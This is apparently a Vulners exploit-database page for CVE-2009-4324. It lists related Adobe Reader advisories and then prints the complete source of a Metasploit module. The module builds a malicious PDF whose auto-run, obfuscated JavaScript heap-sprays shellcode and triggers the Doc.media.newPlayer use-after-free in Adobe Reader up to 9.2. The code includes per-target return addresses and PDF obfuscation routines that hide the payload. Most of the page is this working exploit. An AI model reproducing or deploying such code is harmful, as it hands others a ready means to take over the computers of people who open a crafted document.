| Reporter | Title | Published | Views | Family All 74 |
|---|---|---|---|---|
| Adobe Reader and Acrobat (CVE-2009-4324) Exploit | 23 Dec 200900:00 | – | zdt | |
| Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Adobe Acrobat | 27 Jul 202504:17 | – | gitee | |
| Immunity Canvas: ACROBAT_NEWPLAYER | 15 Dec 200902:30 | – | canvas | |
| Adobe Acrobat < 9.3 / 8.2 Multiple Vulnerabilities (APSB10-02) | 13 Jan 201000:00 | – | nessus | |
| Adobe Reader < 9.3 / 8.2 Multiple Vulnerabilities (APSB10-02) | 13 Jan 201000:00 | – | nessus | |
| GLSA-201009-05 : Adobe Reader: Multiple vulnerabilities | 8 Sep 201000:00 | – | nessus | |
| RHEL 5 : acroread (RHSA-2010:0037) | 24 Jan 201300:00 | – | nessus | |
| RHEL 4 : acroread (RHSA-2010:0038) | 24 Jan 201300:00 | – | nessus | |
| RHEL 3 : acroread (RHSA-2010:0060) | 24 Jan 201300:00 | – | nessus | |
| openSUSE Security Update : acroread (acroread-1849) | 25 Jan 201000:00 | – | nessus |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Doc.media.newPlayer Use After Free Vulnerability',
'Description' => %q{
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat
Professional versions up to and including 9.2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown', # Found in the wild
# Metasploit version by:
'hdm',
'pusscat',
'jduck'
],
'References' =>
[
[ 'CVE', '2009-4324' ],
[ 'BID', '37331' ],
[ 'OSVDB', '60980' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => true
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
# test results (on Windows XP SP3)
# reader 6.0.1 - vulnerable / doesn't work
# reader 7.0.5 - untested
# reader 7.0.8 - untested
# reader 7.0.9 - vulnerable / doesn't work
# reader 7.1.0 - untested
# reader 7.1.1 - untested
# reader 8.0.0 - untested
# reader 8.1.1 - works
# reader 8.1.2 - untested
# reader 8.1.3 - untested
# reader 8.1.4 - untested
# reader 8.1.5 - untested
# reader 8.1.6 - untested
# reader 9.0.0 - untested
# reader 9.1.0 - works
# reader 9.2 - works (no debugger, no DEP)
[ 'Adobe Reader Windows English (JS Heap Spray)',
{
'Size' => (0x10000/2),
'Ret' => 0x0c0c0c0c,
}
],
[ 'Adobe Reader Windows German (JS Heap Spray)',
{
'Size' => (0x10000/2),
'Ret' => 0x0a0a0a0a,
}
],
],
'DisclosureDate' => '2009-12-14',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
])
end
def exploit
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Make some nops
nops = Rex::Text.to_unescape([target.ret].pack('V'))
# Randomize variables
#
len = 72
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
rand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
vtbuf = [target.ret].pack('V') * 4
vtbuf << rand_text_alpha(len - vtbuf.length)
vtbuf.gsub!(/([dhHjmMsty])/m, '\\\\' + '\1')
retstring = Rex::Text.to_unescape(vtbuf)
# The printd strings are 72 bytes (??)
script = %Q|
var #{rand1} = unescape("#{shellcode}");
var #{rand2} = unescape("#{nops}");
var #{rand3} = unescape("#{retstring}");
while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
#{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= #{rand2} + #{rand1};
}
util.printd("#{rand4}", new Date());
util.printd("#{rand5}", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(#{rand3}, new Date());
|
# Create the pdf
pdf = make_pdf(script)
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(pdf)
end
def random_non_ascii_string(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def io_def(id)
"%d 0 obj" % id
end
def io_ref(id)
"%d 0 R" % id
end
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
def n_obfu(str)
result = ""
str.scan(/./u) do |c|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
result << "#%x" % c.unpack("C*")[0]
else
result << c
end
end
result
end
def ascii_hex_whitespace_encode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
def make_pdf(js)
xref = []
eol = "\x0d\x0a"
endobj = "endobj" << eol
pdf = "%PDF-1.5" << eol
pdf << "%" << random_non_ascii_string(4) << eol
xref << pdf.length
pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
xref << pdf.length
pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
xref << pdf.length
pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
xref << pdf.length
pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
xref << pdf.length
pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
xref << pdf.length
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << endobj
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF" << eol
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation